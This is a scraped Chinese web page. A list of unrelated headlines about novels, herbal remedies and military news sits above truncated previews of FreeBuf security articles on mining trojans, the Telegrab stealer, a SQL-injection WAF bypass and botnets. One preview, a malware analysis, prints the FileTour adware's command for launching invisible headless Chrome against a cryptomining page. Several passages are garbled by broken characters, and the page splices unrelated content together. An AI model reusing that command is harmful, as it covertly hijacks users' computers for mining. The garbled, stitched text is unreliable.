• 巨无霸“大风车”转起来!惠州正抢占这片新蓝海 2018-03-27
  • 条纹看多就头疼可能是光敏体质 2018-03-27
  • “平均主义”有悖精准脱贫题中之义 2018-03-27
  • 竹编:缝隙里的乡愁文章中国国家地理网 2018-03-27
  • 【车顶玩偶很拉风?危险又违法!】苏州公安:车顶放葫芦娃这样安全吗? 2018-03-27
  • 我的老千生涯第3部有声小说 2018-03-27
  • 千金有毒:妖孽校草靠边站 全文阅读 2018-03-27
  • 中国客车销量降幅明显 2018-03-27
  • AK – 军事频道标签 – 铁血网 2018-03-27
  • 转出新速度 焕发新活力 2018-03-27
  • 中山3名全国人大代表共提交11份建议 2018-03-27
  • 武警部队领导指挥体制和力量结构将进行调整改革 2018-03-27
  • 互联时代 社群营销商如何落地? 2018-03-27
  • 腹黑小婢 湛露 言情小说 2018-03-27
  • 强肾壮阳吃什么中药 哪些中药可以强肾壮阳 2018-03-27
  • FreeBuF.COM

    高质量的全球互联网安全媒体平台

    15494人订阅
    SURFSRC | 一个针对“比特票”挖矿木马样本的分析 一.背景 近期接到客户反馈,其网络中有部分终端机器异常,拿到客户提供的样本分析后定性为是一起挖矿木马入侵事件,该挖矿木马复用了大量开源代码,用于对BTV(“比特票”,一种基于比特币的分支币种)进行挖矿。? 二.样本详细分析 通过分析客户提供的样本,发现样本实际上是不全的,但是并不影响对本次威胁的定性。其中最主要有三个样本文件: 样本名 功能 SHA256 run.bat 启动挖矿进程的bat脚本 a02d5079ae3eeacb463aa855a1daec72587ff2bbf576cb95081ad9b56d614684 Svchost.exe 基于NSSM的?;そ?29F0DBF2D07C4B68C3C9EE0D139D80BAD3E9058FBF9DBD574CB5B047CF742E74 Systmss.exe 挖矿进程 24AE1FCD6080097248C1F2171218DA3DBD22E46CFEF854...
    Linux系统之Redis扩散病毒继续分析 *本文原创作者:cgf99,本文属FreeBuf原创奖励计划,未经许可禁止转载 我们安全团队前两次分析了redis病毒和etn挖矿病毒行为,请见“利用Redis未授权访问漏洞的挖矿病毒阴魂不散”“和“Linux系统ETN挖矿病毒实例分析”两篇文章。 印象中,从2017年下半年开始,感觉挖矿事件层出不穷。只要有客户的网络系统发生异常报告,基本都是从CPU发生异???。现在只要听到客户报告其主机系统出现异常,我们的第一反应就是,是不是又是“挖矿”???还真的是,到了现场一看,确实,恭喜“亲”,你又成为辛勤奉献、任劳任怨的苦力小矿工了。 一、系统环境 操作系统:Ubuntu?? 内核:Linux4.4.0-57-generic x86_64 该主机对外开放两个端口,分别是22端口(S...
    评估补丁管理软件:6个关键考虑事项 补丁管理是一项复杂且资源密集型的工程。但是,如果有一款合适的补丁管理软件加持,就能达到事半功倍的效果。 什么是补丁管理软件? 补丁管理软件可以帮助IT部门,为企业中正在运行的软件获取、测试和安装代码更新。此外,它还可以评估软件内的漏洞,为补丁程序划分优先级,以及生成有关修复活动和状态的报告等。 补丁管理软件在当今IT环境中是一项关键功能,因为成功部署修补程序(其中很大一部分修复了可被黑客利用的代码漏洞)已经变得越来越复杂且越来越重要。 企业通?;嵩诟髦殖∷ㄈ缭诒镜?、云端、远程以及移动端点等)的众多设备上,运行各种操作系统和应用程序,如果没有补丁管理软件帮助划分优先级,以及追踪补丁更新状态,那么想要完...
    Telegrab恶意软件可以获取Telegram的密码、cookie及密钥文件 思科Talos研究人员发现了名为Telegrab的病毒,这个病毒会从telegram桌面版中窃取信息。 我们知道Telegram正受到俄罗斯媒体监督机构Roskomnadzor的攻击,Roskomnadzor要求telegram分享技术细节以获取用户的聊天信息。上个月,俄罗斯当局封锁了telegram程序,因为telegram拒绝向俄罗斯联邦安全局提供用户的加密密钥。 窃取Telegram数据 分析这款恶意软件后研究人员发现,软件是由说俄语的黑客开发的,而目标也是俄语用户。 恶意代码是Telegrab恶意软件的一个变体,Telegrab首次发现于2018年4月4日功能是收集telegram的缓存和密钥文件。 Telegrab恶意软件的第二个版本发现于2018年4月10日,开发团队似乎非?;钤?。 尽管Telegrab的第一个版本只会窃取...
    MySQL联合注入之绕过安全狗到GetShell * 本文作者:心东,本文属FreeBuf原创奖励计划,未经许可禁止转载 发现网上公开过安全狗的方法少之又少,而且基本都是给个大概点就结束,本文章是将整个过程记录了一遍,因为一开始我也没想到我能成功的绕过去,大概过程是这样:Mysql基础必须要有–>定位—>fuzz—>得出分析结果–>手工测试—>成功绕过。 网站安全狗: 面向网站安全,包括:网马扫描及查杀(自有引擎,只针对网页木马);网马主动防御功能(可主动拦截网马 上传和访问的动作);防SQL注入功能、防XSS跨站攻击 功能;防盗链防下载;以及防止CC攻击。? 相关代码: 测试过程 为了得到更好的测试,我写了21行的漏洞代码,用来模拟攻击,并且在本机搭建了安全狗,选择了4.0最新版本,...
    恶意软件的小伎俩,伪装成Cloudflare页面默默挖矿 FileTour是一种广告软件,通常作为游戏和其他软件的破解或欺骗手段传播。这个软件包是界定于广告软件和PUP以及更危险的计算机感染类型(如密码窃取木马和矿工)之间,也因此而臭名昭著。? 此广告软件包可以创建Windows自动运行,当用户登录到Windows时,它会自动启动Chrome并连接到浏览器内的挖掘页面。更糟糕的是,用户并不能直接发现这些操作。 用于启动Headless Chrome的命令行 用户登录Windows时用于启动Chrome的命令是: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --headless --disable-gpu --remote-debugging-port=9222 https://de-mi-nis-ner2.info/cdn-41.html?t=0.4 该命令将导致chrome以不可见的状态打开,无需...
    “古惑仔”械斗上演:看Satori僵尸网络如何争夺百万路由器江湖 潮热夏夜,昏黄灯光下的巷子口,砍刀、水管、酒瓶按捺不住地摩挲作响。这是黑帮电影中,古惑仔街头械斗的经典场景。所谓手持利器,杀心自起,无论是争夺尖沙咀老大,还是铜锣湾扛把子,利益始终是使人头破血流的终极目的。 网络江湖也如此,前不久,可影响百万GPON家用光纤路由器的漏洞(CVE-2018-10561,CVE-2018-10562)曝光。漏洞大杀器出现后,360网络安全研究院监测到,10天内已经有至少5个僵尸网络家族在积极利用该漏洞构建其僵尸军团,包括mettle、muhstik、mirai、hajime、satori等等。(详情参见:http://www.freebuf.com/articles/network/171491.html) 对百万路由器的控制,犹如一块硕大的肥肉,而控制权的排他性,决定了想吃上这块...
    BUF早餐铺 | 账号被劫?用户微博被曝自动点赞淫秽内容;Facebook安卓应用请求ROOT权限,用户表示很担心;超过2亿套日本人的个人身份信息在地下黑市售卖 各位 Buffer 早上好,今天是 2018 年 5 月 22 日星期二,农历四月初八。今天的 BUF 早餐主要有:账号被劫持?用户微博被曝自动点赞淫秽内容;Facebook安卓应用请求ROOT权限,用户表示很担心;超过2亿套日本人的个人身份信息(PII)在地下黑市售卖;红帽 Linux 的 DHCP 客户端被发现易遭受命令行注入攻击;新的邪恶Mirai僵尸网络至少利用了三个新的漏洞。 安全资讯早知道,两分钟听完最新安全快讯~ 【数据安全】 超过2亿套日本人的个人身份信息(PII)在地下黑市售卖 近日,一份 FireEye iSIGHT Intelligence 报告显示一名疑似来自中国的黑客在地下黑市中兜售约 2 亿名日本用户的个人身份信息(Personal Identifiable Information, PII)。数据大...
    支撑国家网信安全,FreeBuf「政府专区」正式上线 5月21日,FreeBuf 完成改版,在首页右侧正式上线「政府专区」栏目?!刚ㄇ故荈reeBuf 为国家网络信息安全相关政府机构独立开设的特别栏目,发布权威资讯、政策与观点,为国家网信安全提供坚实媒体支撑。 FreeBuf 是目前国内关注度最高、受众最广的互联网安全新媒体,是网络安全资讯、威胁情报预警信息发布的最佳媒体平台,大量网络安全厂商、网络安全从业者以及网络安全爱好者在这里汇聚交流。 没有网络安全就没有国家安全,就没有经济社会稳定运行。网络安全,牵一发而动全身。当前,互联网信息技术的快速发展,在推动社会经济高速发展的同时也带来了更多的安全隐患。新时代新担当,作为国内信息安全媒体代表之一,FreeBuf 有责任、有义务...
    从Cloud Foundry谈企业PaaS环境的安全风险与评估 * 本文作者:ipenox,本文属FreeBuf原创奖励计划,未经许可禁止转载 前言 PaaS是云计算领域的三大业态之一。PaaS作为应用的运行平台,提供一个操作系统级的容器,在该容器中安装应用运行时所需要的所有依赖,使得开发者可以更加专注于开发任务本身。Cloud Foundry(CF)是业界第一个开源的PaaS云平台,Pivotal是CloudFoundry代码的主要贡献者。作为PaaS领域的佼佼者,Pivotal Cloud Foundry(PCF)得到了相对广泛的应用。 尽管AWS上有成熟的原生CF环境可以使用,也有业企选择在自己的数据中心中自建CF环境,以便与已有的传统IT架构连接,以敏捷开发方式驱动,更好地支撑不断增长的业务创新需求。 在本文中,我将结合自己公司在应用PCF过程中的实...